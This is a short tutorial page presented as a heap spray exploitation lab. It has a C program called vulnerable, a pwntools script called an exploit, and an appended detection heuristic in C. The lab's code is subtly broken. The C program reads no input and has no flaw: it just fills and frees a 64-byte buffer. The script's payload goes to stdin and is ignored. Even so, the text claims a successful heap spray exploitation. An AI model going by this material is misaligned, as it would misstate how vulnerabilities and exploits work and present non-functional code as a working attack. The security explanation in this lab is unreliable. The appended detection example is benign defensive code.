strangerRidingCaml
Heap Spray Techniques Lab
In this lab, we will manipulate the heap with heap spray techniques to facilitate exploitation.
Lab Activities:
1. Creating Vulnerable C Program:
First, let's create a vulnerable C program with a heap manipulation vulnerability.
    #include <stdio.h>
    #include <stdlib.h>

    void vulnerable_function() {
        /* Allocate a single 64-byte chunk on the heap */
        char *ptr = (char *)malloc(64);
        if (ptr != NULL) {
            // Simulate heap spray: fill the whole chunk with 'A' bytes
            for (int i = 0; i < 64; i++) {
                ptr[i] = 'A';
            }
            printf("Heap spray completed.\n");
            free(ptr);
        }
    }

    int main() {
        vulnerable_function();
        return 0;
    }
Save the above code to a file named vulnerable.c and compile it with the following command:
$ gcc -o vulnerable vulnerable.c
2. Writing Exploit Script:
Now, let's write an exploit script in Python using pwntools to perform heap spraying.
    from pwn import *

    # Specify the path to the vulnerable binary
    binary_path = './vulnerable'

    # Payload for heap spraying
    payload = b'A' * 64

    # Launch the exploit: start the binary as a child process
    p = process(binary_path)
    # Write the payload to the process's stdin
    p.send(payload)
    p.recvline()  # Receive the output indicating heap spray completion
    p.close()
Explanation of the Python script:
- We specify the path to the vulnerable binary and create a payload consisting of 'A' characters to spray the heap.
- We launch the vulnerable binary and send the payload to perform heap spraying.
- We receive the output indicating heap spray completion.
3. Exploiting the Vulnerability:
Save the Python script as exploit.py and execute it to perform heap spraying:
$ python exploit.py
Once executed, you should observe the output indicating the completion of heap spraying, demonstrating the successful manipulation of the heap using heap spray techniques.
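Seen from the detection side, the uniform fill this lab writes into its chunk is the kind of pattern a memory-scanning heuristic can flag. The following is an added example, not part of the original lab: the function names, the 0.95 threshold and the sample buffers are assumptions constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

/* Fraction (0..1) of bytes that equal the byte `period` positions earlier. */
static double periodic_fraction(const unsigned char *buf, size_t len, size_t period) {
    if (period == 0 || len <= period) return 0.0;
    size_t same = 0;
    for (size_t i = period; i < len; i++)
        if (buf[i] == buf[i - period]) same++;
    return (double)same / (double)(len - period);
}

/* Smallest period in 1..max_period whose repetition covers at least
 * `threshold` of the buffer; 0 if the buffer does not look like a fill.
 * (Hypothetical heuristic; threshold and max_period are tuning assumptions.) */
size_t spray_period(const unsigned char *buf, size_t len,
                    size_t max_period, double threshold) {
    for (size_t p = 1; p <= max_period; p++)
        if (periodic_fraction(buf, len, p) >= threshold) return p;
    return 0;
}

/* Constructed sample: deterministic pseudo-random bytes standing in for
 * ordinary, non-repeating heap contents. */
void fill_mixed(unsigned char *buf, size_t len) {
    unsigned int x = 12345u;
    for (size_t i = 0; i < len; i++) {
        x = x * 1103515245u + 12345u;
        buf[i] = (unsigned char)(x >> 16);
    }
}

int main(void) {
    unsigned char lab[64], block[64], mixed[64];
    memset(lab, 'A', sizeof lab);              /* same fill as vulnerable.c */
    for (size_t i = 0; i < sizeof block; i++)  /* constructed 4-byte repeating block */
        block[i] = (unsigned char)"ABCD"[i % 4];
    fill_mixed(mixed, sizeof mixed);

    printf("lab fill   : period %zu\n", spray_period(lab, sizeof lab, 16, 0.95));
    printf("4-byte fill: period %zu\n", spray_period(block, sizeof block, 16, 0.95));
    printf("mixed data : period %zu\n", spray_period(mixed, sizeof mixed, 16, 0.95));
    return 0;
}
```

A result of 0 means no short repeating pattern dominates the buffer; a real scanner would apply the same test across many large allocations, not one 64-byte chunk.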